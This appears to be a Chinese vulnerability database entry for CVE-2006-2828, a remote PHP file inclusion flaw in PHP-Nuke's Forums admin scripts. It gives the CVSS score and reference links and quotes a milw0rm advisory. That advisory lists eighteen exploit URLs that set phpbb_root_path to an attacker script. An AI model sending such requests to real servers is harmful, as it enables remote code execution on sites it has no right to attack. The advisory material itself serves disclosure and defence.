CVE-2006-2828
CVSS6.4
发布时间 :2006-06-05 16:06:00
修订时间 :2008-09-05 17:05:32
NMCOE    

[原文]Global variable overwrite vulnerability in PHP-Nuke allows remote attackers to conduct remote PHP file inclusion attacks via a modified phpbb_root_path parameter to the admin scripts (1) index.php, (2) admin_ug_auth.php, (3) admin_board.php, (4) admin_disallow.php, (5) admin_forumauth.php, (6) admin_groups.php, (7) admin_ranks.php, (8) admin_styles.php, (9) admin_user_ban.php, (10) admin_words.php, (11) admin_avatar.php, (12) admin_db_utilities.php, (13) admin_forum_prune.php, (14) admin_forums.php, (15) admin_mass_email.php, (16) admin_smilies.php, (17) admin_ug_auth.php, and (18) admin_users.php, which overwrites $phpbb_root_path when the import_request_variables function is executed after $phpbb_root_path has been initialized to a static value.


[CNNVD]PHP-Nuke 多个全局变量重写漏洞(CNNVD-200606-096)

        PHP-Nuke存在全局变量重写漏洞,远程攻击者可通过修改传给管理脚本(1) index.php,(2) admin_ug_auth.php,(3) admin_board.php,(4) admin_disallow.php,(5) admin_forumauth.php,(6) admin_groups.php,(7) admin_ranks.php,(8) admin_styles.php,(9) admin_user_ban.php,(10) admin_words.php,(11) admin_avatar.php,(12) admin_db_utilities.php,(13) admin_forum_prune.php,(14) admin_forums.php,(15) admin_mass_email.php,(16) admin_smilies.php,(17) admin_ug_auth.php和(18) admin_users.php(在$phpbb_root_path初始化为静态值之后,执行import_request_variables函数时,重写$phpbb_root_path)的phpbb_root_path参数来发起远程PHP文件包含攻击。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2828
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-096
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/archive/1/435705/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060602 Re: Re: # MHG Security Team --- PHP NUKE All version Remote File Inc.
http://www.securityfocus.com/archive/1/archive/1/435611/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060601 Re: # MHG Security Team --- PHP NUKE All version Remote File Inc.
http://www.securityfocus.com/archive/1/archive/1/435407/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060531 # MHG Security Team --- PHP NUKE All version Remote File Inc.
http://xforce.iss.net/xforce/xfdb/27368
(UNKNOWN)  XF  phpnuke-phpbbrootpath-fileInclude(27368)
http://securityreason.com/securityalert/1040
(UNKNOWN)  SREASON  1040

- 漏洞信息

PHP-Nuke 多个全局变量重写漏洞
中危 未知
2006-06-05 00:00:00 2006-06-05 00:00:00
远程  
        PHP-Nuke存在全局变量重写漏洞,远程攻击者可通过修改传给管理脚本(1) index.php,(2) admin_ug_auth.php,(3) admin_board.php,(4) admin_disallow.php,(5) admin_forumauth.php,(6) admin_groups.php,(7) admin_ranks.php,(8) admin_styles.php,(9) admin_user_ban.php,(10) admin_words.php,(11) admin_avatar.php,(12) admin_db_utilities.php,(13) admin_forum_prune.php,(14) admin_forums.php,(15) admin_mass_email.php,(16) admin_smilies.php,(17) admin_ug_auth.php和(18) admin_users.php(在$phpbb_root_path初始化为静态值之后,执行import_request_variables函数时,重写$phpbb_root_path)的phpbb_root_path参数来发起远程PHP文件包含攻击。

- 公告与补丁

        暂无数据

- 漏洞信息 (1866)

PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions (EDBID:1866)
php webapps
2006-06-02 Verified
0 ddoshomo
N/A [点击下载]
# Milli-Harekat Advisory ( www.milli-harekat.org )
# PHP-Nuke <= All version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : PHP NUKE ALL VERSION
# Credits : ERNE
# Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
# Vulnerable :

http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]

# milw0rm.com [2006-06-02]
		

- 漏洞信息

31776
PHP-Nuke mainfile.php phpbb_root_path Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-30 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站